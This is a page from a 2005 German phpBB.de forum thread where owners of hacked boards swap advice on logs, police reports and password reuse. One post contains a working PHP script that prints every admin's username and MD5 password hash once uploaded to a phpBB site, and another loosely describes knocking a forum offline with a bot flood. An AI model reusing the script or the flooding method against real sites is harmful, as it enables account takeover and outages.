phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Gehackt von einem NOOB Hacker

https://www.phpbb.de/community/viewtopic.php?t=98835

Seite 2 von 2

omG

Verfasst: 03.10.2005 08:39
von FSKiller / Phoenix
LoL Hacker? auf so undebeutenden Seiten? Ey Jungs kommt mal klar, das einfach ein Kind was die ganzen Tools testet und eigentlich keine Ahnung hat was es da tut.

1. Hackangriff auf eure Seite? Anbieter anschreiben genau nachfragen Logdateien zuschicken lassen.
2. Backup des Zerstörten Forums machen, LogDateienen von Counter oder sowas auch mit Speichern und zur Polizei gehen, Anzeige geben unbekannt. Alles innnerhalb von 9 Tagen wo es passiert ist.
3. Niemals die selben PWs für mehrere Sachen nehmen.

Persönliche hate ich so einen Spinner auf einem System was dafür perfekt ausgelegt war der hat die Seite nach schönster Kunst zugeballert, nur leider hat er sich auch an mein GameServer rangewagt und nach dem ich ihn mal vollgepingt habe und ihn zugetextet habe auf englisch habe hat er es wirgendwann eingesehen das seine Aktionen dumm waren.

Jeder der Seine phpBB nicht auf der Neuesten Version hat ist eigentlich selber schuld....

@C-H-T: es geht auch ohne so Tools oder Script, es reicht ein Seite vom Forum wo viel SQL kram ist und die gibt man in einem Programm ein drückt start und prompt sind mehr als 200 Bots auf der Seite und SQL wird ein weig überlastet und alles kommt dazu das der Server sich abschaltet oder der Anbieter die Seite offline nimmt und da ist es egal welches Foren System da geht alles in die Knie ausser ist ne guter Anbieter .. ;).

Verfasst: 03.10.2005 13:58
von C-H-T
ZeroxXx hat geschrieben:Hallo,

heute wurde mein Forum auch gehackt...bzw. der Hacker hat alle Beiträge und Forums gelöscht und danach mit meinen Account geschrieben das ich mal meinen Board updaten soll. Wenn er das mit meinen Acc geschrieben hat heisst das das er jetzt auch meinen Password kennt? Weil dem passwort benutze ich noch auf paar anderen Seiten...


Danke im Voraus!
kommt drauf an... weiß ja nicht was er direkt gemacht hat... könnte sein das er einfach das admin pw geändert hat und sich dann eingelogt hat... aber gehe mal lieber davon aus das er dein passwort kennt und ändere das überall... noch dazu solltest du nie das selbe passwort bei sowas verwenden...

und falls du mit dem admin account schreibst ist das auch schlecht.. lieber nen account anlegen der unscheinbar ist und dem admin rechte geben... und deinem account nur Moderator... das erschwert dann schonmal dem hacker den richtigen account zu finden um den dann zu hacken :) glaub ich mal zumindestens :P

angaben ohne gewehr ;)


mfg

Verfasst: 03.10.2005 15:09
von fanrpg
C-H-T hat geschrieben:
ZeroxXx hat geschrieben:Hallo,

heute wurde mein Forum auch gehackt...bzw. der Hacker hat alle Beiträge und Forums gelöscht und danach mit meinen Account geschrieben das ich mal meinen Board updaten soll. Wenn er das mit meinen Acc geschrieben hat heisst das das er jetzt auch meinen Password kennt? Weil dem passwort benutze ich noch auf paar anderen Seiten...


Danke im Voraus!
kommt drauf an... weiß ja nicht was er direkt gemacht hat... könnte sein das er einfach das admin pw geändert hat und sich dann eingelogt hat... aber gehe mal lieber davon aus das er dein passwort kennt und ändere das überall... noch dazu solltest du nie das selbe passwort bei sowas verwenden...

und falls du mit dem admin account schreibst ist das auch schlecht.. lieber nen account anlegen der unscheinbar ist und dem admin rechte geben... und deinem account nur Moderator... das erschwert dann schonmal dem hacker den richtigen account zu finden um den dann zu hacken :) glaub ich mal zumindestens :P

angaben ohne gewehr ;)


mfg
Das ist das geringste Problem man muss nur irgendwie so eine Datei auf den Webspace kriegen oder SQL Befehle ausführen können:

Code: Alles auswählen

<?php 
//Benötigte Dateien und Variablen von phpBB 
define('IN_PHPBB', true); 
$phpbb_root_path = './'; 
include($phpbb_root_path . 'extension.inc'); 
include($phpbb_root_path . 'common.'.$phpEx); 


//Session auslesen und Benutzer-Informationen laden 
$userdata = session_pagestart($user_ip, PAGE_INDEX); 
init_userprefs($userdata); 


//Dieser Block kann weggelassen werden, wenn du nur den die Userdaten brauchst und auf den phpBB-Header verzichen möchtest 
$page_title = 'Hacking the Board'; 
include($phpbb_root_path . 'includes/page_header.'.$phpEx); 



$sql = "SELECT * FROM `".$table_prefix."users` WHERE `user_level` = '1'";
$result = mysql_query($sql) or die(mysql_error());
while($row = mysql_fetch_assoc($result))
{
echo "ID: " . $row['user_id'] . " Username: " . $row['username'] . " Passwort(md5): " . $row['user_password'] . "<br />";
}




//Footer - nur dann weglassen, wenn du auch den Header weglässt 
include($phpbb_root_path . 'includes/page_tail.'.$phpEx); 
?>

Verfasst: 04.10.2005 18:41
von C-H-T
ja und das klappt zum glück nicht^^ da müssten die ja das passwort hacken... und das stell ich mir schwer vor.. besonders mit sonderzeichen.. etc. und arcor hat im allgemeinen auch was gegen ips die innerhalb einer minute mehrere hundertmale connecten ;) und der hacker von meinem board (meines clans) hatte auch das passwort nicht gehackt...

mfg
Alle Zeiten sind UTC+02:00
Seite 2 von 2

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de